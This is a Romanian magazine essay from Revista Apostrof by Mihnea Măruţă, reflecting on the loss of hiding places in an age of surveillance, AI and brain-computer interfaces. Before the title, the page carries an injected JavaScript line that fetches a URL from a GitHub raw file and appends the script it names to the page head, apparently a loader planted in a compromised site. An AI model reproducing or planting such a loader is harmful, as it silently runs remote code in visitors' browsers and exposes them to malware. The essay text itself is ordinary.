;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Revista Apostrof | MIHNEA MĂRUŢĂ, UNDE NE MAI PUTEM ASCUNDE?
 

MIHNEA MĂRUŢĂ, UNDE NE MAI PUTEM ASCUNDE?

Două erau metodele neconvenţionale de a câştiga la „Ascunsa“, când eram copii în faţa blocului. Prima era să nu te ascunzi deloc: să te duci tiptil în spatele celui care număra, ca să-l „scuipi“ chiar în secunda în care termina de zis „… îl iau cu lopata“ şi se întorcea să plece în căutare. A doua metodă era să pleci departe (la un alt bloc, de pildă), undeva unde „puitorul“ nu-şi permitea să ajungă, fiindcă l-ar fi prins descoperit copiii care erau pitulaţi prin preajmă. Cu mintea de acum, ambele erau forţări ale limitelor jocului, cu condiţia ca jocul să presupună un loc ce se cere a fi „cucerit“.

Mi-am amintit de „Ascunsa“ din copilărie gândindu-mă la cazul lui Hassan Nasrallah, fostul lider Hezbollah care a fost localizat când a dat mâna cu un agent israelian care se unsese cu o substanţă specială, un „unguent GPS“. După două minute de la acea strângere de mână, buncărul unde se afla Nasrallah a fost lovit cu 80 de tone de bombe.

Şi mi-am zis atunci că, uite, în timpul vieţilor noastre, Pământul a devenit o planetă unde nu te mai poţi ascunde. Tehnologiile au devenit atât de performante, încât, oricâţi bani ai avea şi oricât de precaut ai fi, nu mai există nici vizuină şi nici buncăr unde să nu poţi fi detectat şi, la o adică, ucis.

Dar ceea ce ştim sigur din istorie e că nu există libertate fără şansa de a te ascunde. În absenţa acestei şanse (una eminamente politică), nu sunt posibile nici revoluţiile şi nici împotrivirea faţă de o dictatură. E nevoie de locuri secrete sau inaccesibile ca să rămâi în viaţă şi ca să plănuieşti o eliberare, individuală sau colectivă.

Or, din moment ce o ascundere obiectivă nu mai este fezabilă, din moment ce tot globul este acum la vedere sau accesibil, ne-a mai rămas doar ascunderea subiectivă. Este ceea ce a înţeles, între alţii, scriitorul chinez Liu Cixin: în trilogia SF „Amintiri din trecutul Terrei“, a cărei tramă este decizia unei civilizaţii extraterestre de a porni încoace pentru a ne elimina, el alege patru vizionari, denumiţi Wallfacers (Cei-cu-faţa-la-zid), care au ca misiune conceperea unei strategii câştigătoare. Şi, pentru că duşmanul monitorizează toate comunicaţiile de pe Terra, aceşti strategi nu se mai pot ascunde altundeva decât în propria minte.

Într-un fel, acesta este stadiul real în care ne aflăm, fără să fi apărut vreo ameninţare galactică. Nu întâmplător au explodat identităţile false, avatarurile şi tehnologia deepfake: a fi în reţea înseamnă a fi conectat, iar a fi conectat înseamnă a fi detectabil şi recognoscibil.

Pentru omul de azi, omul-nod, nu mai există altă ascunzătoare decât înăuntrul propriei minţi. Dar nici această situaţie nu va mai dura mult. Anul trecut, o inteligenţă artificială non-invazivă a „citit“ gândurile unei persoane, transformând în text scanările obţinute prin tehnologia fMRI (care măsoară afluxul de sânge din creier).

Aţi putea spune că nouă, majorităţii, ne mai rămâne totuşi o marjă de libertate cât timp nu ni se impun asemenea scanări cerebrale. Şi atunci v-aş răspunde că, pe termen mediu, milioane de oameni vor alege, de bunăvoie, nu doar să le fie citite gândurile sub formă de experiment, ci chiar să îşi implanteze în creier un dispozitiv, denumit Brain-Computer Interface (BCI), prin care să se conecteze non-stop la internet. Este tehnologia la care lucrează, de pildă, compania Neuralink a lui Elon Musk, dar şi o alta, denumită Synchron, finanţată de Bill Gates şi de Jeff Bezos.

În acest stadiu, implantul are scopuri medicale şi va ajuta miraculos bolnavi de Parkinson, nevăzători şi persoane paralizate. Numai că BCI-urile sunt prezentate deja şi ca unica variantă prin care oamenii vor face faţă confruntării cu inteligenţa artificială. Elon Musk a explicat-o limpede într-un recent interviu: „Din punctul de vedere al unui computer care execută trilioane de operaţiuni într-o secundă, între două apăsări de taste din partea omului trece o eternitate“.

„Punctul de vedere al computerului“: aceasta devine referinţa de care vom fi obligaţi să ţinem seama dacă vrem ca oamenii să supravieţuiască „invaziei“ A.I.

Nu ne vom mai putea ascunde nicăieri – nici în propriile minţi şi nici măcar în spatele celui care ne caută – deoarece, în comparaţie cu A.I., capacitatea noastră de procesare este ca o secundă raportată la veşnicie. Aşa că, în ciuda măştilor pe care ni le tot confecţionăm, viitorul în reţea pare a duce înspre completă dezvăluire de sine.

De aceea, vreau să închei cu aceste fraze minunat de tragice, scrise de Don DeLillo (în romanul „Punctul Omega“): „Dacă dezvălui totul, dacă scoţi la iveală fiecare sentiment, dacă ceri înţelegere, pierzi ceva crucial în privinţa sentimentului de-a fi tu însuţi. Trebuie să ştii lucruri pe care ceilalţi nu le ştiu. Ceea ce nimeni nu ştie despre tine este ceea ce-ţi permite să te cunoşti pe tine însuţi“.